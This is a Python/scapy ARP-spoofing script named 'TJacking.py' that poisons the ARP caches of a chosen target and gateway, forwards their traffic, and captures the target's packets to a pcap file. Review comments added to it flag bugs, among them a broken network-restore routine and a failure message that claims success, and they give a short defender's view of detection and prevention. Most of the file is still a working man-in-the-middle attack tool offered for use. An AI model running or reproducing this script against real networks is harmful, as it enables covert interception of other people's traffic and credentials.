TJacking.py
#ARPSPOOFING2.0
#Author: GrayFox
#For team Cypher
#usr/env/python2
# Print the ASCII-art banner. This executes at module load, before the imports below.
print ("""
$$$$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\
\__$$ __|$$ __$$\ $$ __$$\ $$ | $$ |
$$ | $$ / \__|$$ | $$ |$$ | $$ |
$$ | $$ | $$$$$$$ |$$$$$$$$ |
$$ | $$ | $$ ____/ $$ __$$ |
$$ | $$ | $$\ $$ | $$ | $$ |
$$ | \$$$$$$ |$$ | $$ | $$ |
\__| \______/ \__| \__| \__|
Made By GrayFox""")
#Importations
import sys, os, time
from scapy.all import *
import os
import signal
import sys
import threading
import time
# Pre-flight output and operator prompts (raw_input exists only in Python 2).
# NOTE(review): the original comment said this shows "ARP protocols"; the command
# actually run is netstat filtered for "EST", i.e. established TCP/UDP sockets on
# the local host. It does not display ARP table entries.
os.system ("netstat -tupn | grep EST")
# Pause for 7 seconds by shelling out to sleep; presumably gives time to read the list.
os.system ("sleep 7")
# The three answers are stored as raw strings. Nothing in this file validates them
# as an IP address or an integer before they are used in packet fields, in the
# capture filter string, and in the output file name further down.
target = raw_input("Chosse IP>>>")
tunnel = raw_input("chosse the tunnel>>>")
packet = raw_input("Chosse the number of packets to send>>>")
# Aliases used by the rest of the script ("tunnel" is treated as the gateway address).
gateway_ip = tunnel
target_ip = target
packet_count = packet
# scapy globals: the interface is hard-coded to wlan0 and verbosity is set to 0,
# so scapy prints nothing of its own while sending.
conf.iface = "wlan0"
conf.verb = 0
# Resolve an IP address to a MAC address by asking for it over ARP.
# ip_address: address placed in the pdst field of the ARP request.
# Returns the hwsrc field of the first answer received, or None when nothing answers.
def get_mac(ip_address):
# An ARP request (op=1) is built and sent with sr(), scapy's layer-3 send/receive call,
# using retry=2 and timeout=10.
# Layer-2 alternative left by the author: resp, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip_address))
resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
# resp holds (sent, received) pairs; only the first pair is ever inspected.
for s,r in resp:
return r[ARP].hwsrc
# No reply was collected within the retry/timeout budget.
return None
# Cleanup routine: intended to undo the poisoning, turn IP forwarding off, and end the process.
# gateway_ip / gateway_mac: address pair of the gateway as resolved earlier.
# target_ip / target_mac: address pair of the other host as resolved earlier.
# Never returns normally: the last statement sends SIGTERM to this process.
def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
# NOTE(review): both calls build a TCP(...) layer with ARP-style keyword arguments,
# while arp_poison() builds ARP(...). As written this probably does not emit the
# corrective replies the function name implies; affected hosts would then keep the
# forged mapping until their ARP cache entries expire or are refreshed. Confirm
# before treating this as a working cleanup.
send(TCP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
send(TCP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
print("[*] Disabling IP forwarding")
# Turns forwarding off through sysctl; the key name is the macOS/BSD one, per the
# author's "on a mac" comment. The exit status of the command is not checked.
os.system("sysctl -w net.inet.ip.forwarding=0")
# Terminate the whole process, including the non-daemon poison thread, via SIGTERM to our own PID.
os.kill(os.getpid(), signal.SIGTERM)
# Thread body: repeatedly sends forged ARP replies (op=2) to the gateway and to the target
# so each associates the other's IP with the sender's MAC. hwsrc is not set, so scapy
# fills in the sending interface's own MAC address.
# Parameters are the gateway and target IP/MAC pairs; the loop only ends via the except branch.
# Defender view: the result is a steady stream of unsolicited ARP replies, one pair about
# every 2 seconds, in which two different IPs map to one MAC. ARP-watch style monitors and
# IDS ARP-spoof rules flag this pattern, and switch-level Dynamic ARP Inspection (with
# DHCP snooping) or static ARP entries for the gateway prevent it from taking effect.
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
print("[*] Started TCP poison attack [CTRL-C to stop]")
try:
while True:
# Tell the gateway that target_ip lives at our MAC, and the target that gateway_ip does.
send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
time.sleep(2)
# NOTE(review): this function runs in a worker thread (see the Thread creation at the
# bottom of the file). Python delivers KeyboardInterrupt to the main thread, so this
# handler is presumably never reached; cleanup then depends on the main thread's path.
except KeyboardInterrupt:
print("[*] Stopped TCP poison attack. Restoring network")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
# Main flow: enable forwarding, resolve both MACs, start the poison thread, capture, clean up.
print("[*] Starting script: TJAcking.py")
print("[*] Enabling IP forwarding")
# Enables IP forwarding through sysctl (macOS/BSD key name); the exit status is ignored,
# and nothing turns forwarding back off if the script exits early below.
os.system("sysctl -w net.inet.ip.forwarding=1")
print("[*] Gateway IP:"+tunnel)
print("[*] Target IP:"+target)
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
# NOTE(review): this branch is the failure path (no ARP answer from the gateway), yet the
# message also claims success, and the process exits with status 0. Both are misleading
# to anyone reading logs or checking the exit code.
print("[!] Unable to get gateway MAC address. Exiting..In the same way, Hijacking has been succesfull, open your sniffer ;)")
sys.exit(0)
else:
print("[*] Gateway MAC address:"+gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
# Failure path as well; exits with status 0 and leaves forwarding enabled.
print("[!] Unable to get target MAC address. Exiting..")
sys.exit(0)
else:
print("[*] Target MAC address:"+target_mac)
# Start the poisoning loop in a separate, non-daemon thread.
poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
# Capture traffic to or from target_ip on conf.iface and save it as a pcap.
try:
# The filter is built by string concatenation from the unvalidated prompt answer.
sniff_filter = "ip host " + target_ip
print("[*] Starting network capture")
# packet_count is still the raw string typed at the prompt (never converted in this file).
packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count)
# The output file name is derived from the same unvalidated input and is written
# relative to the current working directory.
wrpcap(target_ip + "_capture.pcap", packets)
print("[*] Stopping network capture..Restoring network")
# restore_network() ends the process with SIGTERM, so nothing after this call runs.
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
# Ctrl-C path: no capture file is written here, only cleanup.
print("[*] Stopping network capture..Restoring network")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)